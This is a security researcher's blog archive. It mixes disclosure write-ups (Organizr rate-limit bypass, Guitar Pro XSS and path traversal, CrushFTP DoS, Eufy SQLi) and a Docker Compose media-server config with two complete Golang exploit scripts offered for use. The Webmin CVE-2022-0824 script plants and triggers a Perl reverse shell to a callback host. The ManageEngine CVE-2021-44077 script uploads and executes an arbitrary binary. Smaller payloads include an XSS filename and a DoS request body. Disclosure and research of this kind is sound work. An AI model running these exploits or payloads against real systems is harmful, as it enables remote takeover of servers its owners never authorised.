I was recently awarded the DoD Researcher of the Month for July, 2023. Between moving across the country and other hacking duties, I still had time to hammer away at a particular subdomain and found a bunch of stuff including a null byte truncated file extension file upload RCE that was present in multiple locations. Along with that I had some XSS, SQLi, and auth bypass, I think. I’m gonna try and repeat for August, since I’m on a roll, despite it only being VDP and not a Bug Bounty program. I have some good reports in, and a couple in the works, but I don’t know if they’ll be enough to win, lol. Hopefully I’ll get back to some bounty programs after August.
Author Archives: pizzapower
PyMedusa OS Command Injection
PyMedusa is a well-known video library manager that many of us self-hosted types may use to organize our libraries. I decided to give it a spin one day and found a classic OS command injection as seen here. I reported it ASAP, though I was a little confused as to how to fix it at that time, but the team fix it quite quickly. A great response time!
Sometimes people may say, “Hey, the OSCP is worthless and you won’t find anything like that IRL.” To that I’d reply, “You’d be surprised.” Also, this is a good example of OSWE level security issues. This is a Python app that you can simply clone, install the requirements, and debug easily in VSCode.
This was given CVE-2023-28627.
SQL Injection in Eufy Security Application
I found a textbook SQLi in the Eufy Security application.
Don’t mind the heavy use of red blocks to redact. The first, normal request. Everything looks fine. Notice the response time at 35 milliseconds.
The second request with a 10 second sleep payload. Notice the response time in the bottom right corner.
Was able to dump some info to confirm this was actually real.
It’s been reported and confirmed by Eufy.
Self-Hosted Security Part ? – Poor Rate Limiting in Organizr
Organizr is a self-hosted application written in PHP that basically helps you self-host other services at your home. It’s nifty application with a surprisingly large amount of functionality. I was recently poking at it to find some security holes, and the first thing I ran across was a rate limiting issue on the login function.
When making a POST request to login, there is a body parameter called loginAttempts. If your login fails, the value of this parameter is incremented (via client side JS) and included in the next login request. When the value reaches a certain number, which is verified in PHP on the backend, the user is locked out.
You can probably see where this is going. Just send it to Burp intruder and never increment the value. Tada!
loginAttempts is set to 1 and the request is sent to Burp Intruder for brute forcingThe PHP backend will always see the value of loginAttempts as 1, and brute forcing is allowed to occur.
The same endpoint and method is used to rate-limit 2FA code entry, which allows an attacker to also brute force a 2FA code. This takes a bit of time – I haven’t done the math – but it still works. An attacker can just sit back and fire away with Burp Intruder. A successful login will generate cookies that will work for their specified amount of time.
This issue has been reported on https://huntr.dev.
Docker Compose – Plex, Jackett, Sonarr, Radarr, Lidarr, Prowlarr, qBittorrent, and PIA
I updated this post to add in prowlarr support. But here is the updated docker-compose.yml.
version: '3.8'
services:
pms-docker:
container_name: plex
network_mode: host
hostname: plex
runtime: nvidia
environment:
- TZ=America/New_York
- PLEX_UID=1000
- PLEX_GID=1000
- PLEX_CLAIM=<your claim here>
- ADVERTISE_IP= #ip:port here e.g. http://127.0.0.1:32400
- NVIDIA_VISIBLE_DEVICES=GPU-04aeacae-0ae1-25b6-1504-a4bec4ed2da9 #change as needed
- NVIDIA_DRIVER_CAPABILITIES=compute,video,utility
volumes:
- /var/docker/plex/config:/config
- /var/docker/plex/transcode:/transcode
- /home/user/data/television:/data/tvshows
- /home/user/data/movies:/data/movies
- /home/user/data/music:/data/music
restart: unless-stopped
devices:
- /dev/dri/card0:/dev/dri/card0 #your devices go here
- /dev/dri/renderD128:/dev/dri/renderD128 #may be different
image: plexinc/pms-docker:plexpass
arch-qbittorrentvpn:
container_name: qbittorrentvpn
hostname: qbittorrentvpn
cap_add:
- NET_ADMIN
ports:
- '6881:6881'
- '6881:6881/udp'
- '6969:6969'
- '8118:8118'
container_name: qbittorrentvpn
restart: unless-stopped
volumes:
- '/home/user/data2/data:/data'
- '/home/user/data2/config:/config'
- '/etc/localtime:/etc/localtime:ro'
environment:
- VPN_ENABLED=yes
- VPN_USER= #put your PIA username here
- VPN_PASS= #put your PIA password here
- VPN_PROV=pia
- VPN_CLIENT=openvpn
- STRICT_PORT_FORWARD=yes
- ENABLE_PRIVOXY=yes
- LAN_NETWORK=192.168.1.0/24 #possibly different
- 'NAME_SERVERS=209.222.18.222,84.200.69.80,37.235.1.174,1.1.1.1,209.222.18.218,37.235.1.177,84.200.70.40,1.0.0.1'
- VPN_INPUT_PORTS=1234
- VPN_OUTPUT_PORTS=5678
- DEBUG=false
- WEBUI_PORT=6969 #not the default change in webui
- UMASK=000
- PUID=1000
- PGID=1000
sysctls:
- net.ipv6.conf.all.disable_ipv6=1
image: binhex/arch-qbittorrentvpn
jackett:
image: ghcr.io/linuxserver/jackett
container_name: jackett
environment:
- PUID=1000
- PGID=1000
- TZ=America/New_York
- AUTO_UPDATE=true
- RUN_OPTS=<run options here>
volumes:
- /home/user/data2/jackett/config:/config
- /home/user/data2/data:/downloads
network_mode: host #9117
restart: unless-stopped
radarr:
image: ghcr.io/linuxserver/radarr
container_name: radarr
environment:
- PUID=1000
- PGID=1000
- TZ=America/New_York
volumes:
- /home/user/data2/radarr:/config
- /home/user/data/movies:/movies
- /home/user/data2/data:/downloads
network_mode: host #7878
restart: unless-stopped
sonarr:
image: ghcr.io/linuxserver/sonarr
container_name: sonarr
environment:
- PUID=1000
- PGID=1000
- TZ=America/New_York
volumes:
- /home/user/data2/sonarr:/config
- /home/user/data/television:/tv
- /home/user/data2/data:/downloads
network_mode: host #8989
restart: unless-stopped
lidarr:
image: ghcr.io/linuxserver/lidarr
container_name: lidarr
environment:
- PUID=1000
- PGID=1000
- TZ=America/New_York
volumes:
- /home/user/data2/lidarr:/config
- /home/user/data/music:/music
- /home/user/data2/data:/downloads
network_mode: host #8686:8686
restart: unless-stopped
prowlarr:
image: lscr.io/linuxserver/prowlarr:develop
container_name: prowlarr
environment:
- PUID=1000
- PGID=1000
- TZ=America/New_York
# put your directories here
volumes:
- /home/user/data2/prowlarr:/config
network_mode: host #9696
restart: unless-stoppedWebmin CVE-2022-0824 RCE in Golang
I’ve continued my quest to translate exploits into Golang. Here is an RCE in Webmin due to broken access controls. Please see the following links for more information.
https://nvd.nist.gov/vuln/detail/CVE-2022-0824
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://www.webmin.com/security.html
You can also find this code on my Github.
import (
"bytes"
"crypto/tls"
"flag"
"fmt"
"io"
"log"
"net/http"
"os"
"os/exec"
"regexp"
"runtime"
"strings"
)
func check(e error) {
if e != nil {
fmt.Println(e)
}
}
func makePayload(callbackIP string, callbackPort string) {
payload := []byte("perl -e 'use Socket;$i=\"" + callbackIP + "\";$p=" + callbackPort + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\")};'")
err := os.WriteFile("./commands.cgi", payload, 0644)
check(err)
return
}
func login(client http.Client, target string, creds string) string {
loginURL := target + "/session_login.cgi"
params := "user=" + strings.Split(creds, ":")[0] + "&pass=" + strings.Split(creds, ":")[1]
request, err := http.NewRequest("POST", loginURL, bytes.NewBufferString(params))
if err != nil {
log.Fatal(err)
}
request.Header.Set("Cookie", "redirect=1; testing=1")
request.Header.Set("Content-Type", "application/x-www-form-urlencoded")
var sidCookie = ""
resp, err := client.Do(request)
if err != nil {
log.Fatalln(err)
} else {
sidCookie = resp.Request.Response.Cookies()[0].Value
}
resp.Body.Close()
// now use sid cookie to make sure it works to log in
request, err = http.NewRequest("GET", target, nil)
request.Header.Set("Cookie", "redirect=1; testing=1; sid="+sidCookie)
resp, err = client.Do(request)
if err != nil {
log.Fatalln(err)
}
bodyBytes, err := io.ReadAll(resp.Body)
bodyString := string(bodyBytes)
resp.Body.Close()
r, _ := regexp.Compile("System hostname")
if !r.MatchString(bodyString) {
fmt.Println("----> Unable to obtain sid cookie. Check your credentials.")
return ""
}
return sidCookie
}
func runServer(serverURL string) {
fmt.Println("--> Running a server on " + serverURL)
serverPort := strings.Split(serverURL, ":")[1]
exec.Command("setsid",
"/usr/bin/python3",
"-m",
"http.server",
serverPort,
"0>&1 &").Output()
fmt.Println("--> Server Started!")
return
}
func downloadURL(client http.Client, target string, serverURL string, creds string, sid string) {
URL := target + "/extensions/file-manager/http_download.cgi?module=filemin"
serverIP := strings.Split(serverURL, ":")[0]
serverPort := strings.Split(serverURL, ":")[1]
bodyString := "link=http://" + serverIP + "/" + serverPort + "/commands.cgi&username=&password=&path=/usr/share/webmin"
request, err := http.NewRequest("POST", URL, bytes.NewBufferString(bodyString))
request.Header.Set("Cookie", "sid="+sid)
resp, err := client.Do(request)
if err != nil {
fmt.Println((err))
}
resp.Body.Close()
return
}
func modifyPermissions(client http.Client, target string, serverURL string, creds string, sid string) {
modifyURL := target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
bodyString := "name=commands.cgi&perms=0755&applyto=1&path=/usr/share/webmin"
request, err := http.NewRequest("POST", modifyURL, bytes.NewBufferString(bodyString))
request.Header.Set("Cookie", "sid="+sid)
resp, err := client.Do(request)
if err != nil {
fmt.Println((err))
}
resp.Body.Close()
return
}
func execShell(client http.Client, target string, sid string) {
fileLocation := target + "/commands.cgi"
fmt.Println("--> Triggering shell. Check listener!")
request, err := http.NewRequest("GET", fileLocation, nil)
request.Header.Set("Cookie", "sid="+sid)
resp, err := client.Do(request)
if err != nil {
fmt.Println((err))
}
resp.Body.Close()
return
}
func stopServer() {
out, _ := exec.Command("kill",
"-9",
"$(lsof",
"-t",
"-i:{self.pyhttp_port})").Output()
fmt.Println("--> Killed Server!")
output := string(out[:])
fmt.Println(output)
return
}
func main() {
fmt.Println("--> Running Exploit! Ensure listener is running!")
if runtime.GOOS == "windows" {
fmt.Println("Can't Execute this on a windows machine")
return
}
target := flag.String("t", "https://www.webmin.local:10000", "Target full URL, https://www.webmin.local:10000")
creds := flag.String("c", "username:password", "Format, username:password")
serverURL := flag.String("sl", "192.168.8.120:8787", " Http server for serving payload, ex 192.168.8.120:8080")
callbackIP := flag.String("s", "127.0.0.1", " Callback IP to receive revshell")
callbackPort := flag.String("p", "9999", " Callback port to receive revshell")
flag.Parse()
// uncomment the following to use a local proxy
// proxyUrl, err := url.Parse("http://localhost:8080")
// check(err)
// tr := &http.Transport{
// TLSClientConfig: &tls.Config{InsecureSkipVerify: true, PreferServerCipherSuites: true, MinVersion: tls.VersionTLS11,
// MaxVersion: tls.VersionTLS11},
// Proxy: http.ProxyURL(proxyUrl),
// }
// client := &http.Client{Transport: tr}
// comment out these two lines if using the proxy above.
tr := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true, PreferServerCipherSuites: true, MinVersion: tls.VersionTLS11, MaxVersion: tls.VersionTLS12}}
client := &http.Client{Transport: tr}
makePayload(*callbackIP, *callbackPort)
sid := login(*client, *target, *creds)
runServer(*serverURL)
downloadURL(*client, *target, *serverURL, *creds, sid)
modifyPermissions(*client, *target, *serverURL, *creds, sid)
execShell(*client, *target, sid)
stopServer()
}
Guitar Pro Directory Traversal and Filename XSS
Edit: These were given CVE-2022-43263 and CVE-2022-43264.
I found these vulnerabilities in the latest version of Guitar Pro (1.10.2) on the iPad and iPhone. Neither one is that great of a concern, but they should still get fixed.
Both of these vulnerabilities stem from the feature of these applications that allows a user to import guitar tabs into their application.
First up, a filename XSS, which just happens to be one of my favorite vulnerabilities. I find this on a regular basis – even in 2022. If the user has the screen above open, you can navigate to the URL listed, where you will find the following website, which allows you to upload a file of your choosing. In this case, you can upload a file with the following name.
<img src=x onerror=alert('PizzaPowerWasHere)>.ptbAnd the XSS should pop.
Next up is a directory traversal. I noticed this while running the upload/download process through Burp. Specifically, this stood out as suspicious.
http://192.168.1.71:8080/Documents/local://Guitar%20Pro%206%20Jingle.gpx
This just allows you to download a tab file from your device. The following Burp payload shows the obvious vulnerability.
You can request and receive the usual suspects e.g. passwd, hosts, etc.
Also, there is this endpoint that seems possibly dangerous. I didn’t test it because I didn’t want to delete something of importance.
The vendor has been notified.
Updating All my Passwords
I recently updated nearly every one of my passwords that I had in my password manager. We all know that it is a good security practice to use a different password for every account, but we also know that that is probably not what anybody is doing. It helps if you use a password manager. I use 1password, and I’ve used it for nearly ten years, at this point. I can’t complain about it one bit.
I somehow have managed to not reuse any passwords, according to this. Here my the ‘Watchtower’ result.
I still have a few left to modify, but for reference, the vulnerable passwords category was at nearly 200 when I started.
You’d be surprised if you knew the amount of sites that I ran across that didn’t have an option to change a password. You’d have to pretend like you lost your password and go through the reset process that way.
Also, I took this opportunity to delete accounts that I wasn’t using anymore, or delete accounts for sites that don’t exist anymore. I think it should be a mandatory feature for sites to have a delete your account function, but a lot (most) don’t.
Anyway, go change your passwords.
CrushFTP DoS
I was doing a security review of CrushFTP, a multi-platform FTP application, and I came across a DoS stemming from lack of validation of user input.
Originally, I thought there was broken function level authentication, or something similar, when making a request to this particular endpoint with a specific post body, but I was informed by the dev that it is supposed to be an unauthenticated function call.
An unauthenticated user can make a POST request to the /WebInterface/function/ endpoint, with a body containing the following:
command=encryptPassword&encrypt_type=DES&password=[arbitrarily-long-password]
This request will cause a DoS by supplying massive passwords to be encrypted. Although CrushFTP does have some preventative measures in place for DOS attacks, an attacker is able to send a small amount of requests and bog down the system, as seen in the next picture.
The issue stems from a lack of input validation for the password parameter, as seen on lines 752 through 786 of ServerSessionAJAX.java.
The developer is very responsive and fixed the issue in a couple of hours. As we can see, the password parameter is now limited to 2000 characters.
And he was gracious enough to give me a shout out in the build logs.
https://www.crushftp.com/version10_build.html
All in all, CrushFTP is an awesome application, and it seems to have a great track record in regards to security. There are only a handful of published CVEs for it, and this seems to be the only thing I’ve found in my testing, so far. The dev is also quick to implement fixes, so users aren’t stuck without a fix for long. I wouldn’t hesitate to use CrushFTP in any environment.
With that said, I did some Shodan searching for instances of CrushFTP running with a slightly non-standard default username and password, and I found a fair amount of them. I tried reporting those to the companies that were running them, but I’ve yet to receive any responses.
Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306
Once again, I decided to rewrite an exploit in Golang. Once again, I did thirty seconds of searching to find if someone had already written this one in Golang. Once again, I did not find a preexisting POC in Golang. Once again, I wrote one. Once again, my code is horrible.
You can find a vulnerable version of the software here. You can find this code on my Github here.
package main
import (
"bytes"
"crypto/tls"
"flag"
"fmt"
"io/ioutil"
"log"
"mime/multipart"
"net/http"
"net/url"
"os"
)
func uploadFile(uri string, paramName, path string) {
file, err := os.Open(path)
if err != nil {
log.Fatal(err)
return
}
fileContents, err := ioutil.ReadAll(file)
if err != nil {
log.Fatal(err)
return
}
fi, err := file.Stat()
if err != nil {
log.Fatal(err)
return
}
file.Close()
body := new(bytes.Buffer)
writer := multipart.NewWriter(body)
part, err := writer.CreateFormFile(paramName, fi.Name())
if err != nil {
log.Fatal(err)
return
}
part.Write(fileContents)
writer.Close()
request, err := http.NewRequest("POST", uri, body)
if err != nil {
log.Fatal(err)
}
request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36")
request.Header.Set("Origin", "null")
request.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
request.Header.Set("Content-Type", writer.FormDataContentType())
// set a proxy for troubleshooting
proxyUrl, err := url.Parse("http://localhost:9090")
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
Proxy: http.ProxyURL(proxyUrl),
}
client := &http.Client{Transport: tr}
resp, err := client.Do(request)
if err != nil {
log.Fatalln(err)
} else {
fmt.Println("Response code should be 401, if successful uploading occured.")
fmt.Println(resp.StatusCode)
}
defer resp.Body.Close()
return
}
func triggerExploit(uri string) {
// set a proxy for troubleshooting
proxyUrl, err := url.Parse("http://localhost:9090")
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
Proxy: http.ProxyURL(proxyUrl),
}
client := &http.Client{Transport: tr}
triggerURL := uri + "RestAPI/s247action"
postData := "execute=s247AgentInstallationProcess"
request, err := http.NewRequest("POST", triggerURL, bytes.NewBufferString(postData))
if err != nil {
return
}
request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36")
request.Header.Set("Origin", "null")
request.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
request.Header.Set("Content-Type", "application/x-www-form-urlencoded")
client.Do(request)
}
func main() {
// get flags
VulnerableInstance := flag.String("u", "http://127.0.0.1:8080", "Vulnerable Service Desk URL: http://127.0.0.1:8080")
maliciousFileName := flag.String("f", "exploit.exe", "File you want to upload: exploit.exe")
flag.Parse()
path, err := os.Getwd()
if err != nil {
log.Fatal(err)
}
fullMaliciousFileName := path + *maliciousFileName
fmt.Println("\n---> Uploading File!")
uploadFile(*VulnerableInstance+"RestAPI/ImportTechnicians?step=1", "theFile", fullMaliciousFileName)
fmt.Println("\n---> Triggering!")
triggerExploit(*VulnerableInstance)
fmt.Println("\nExploit Completed!")
}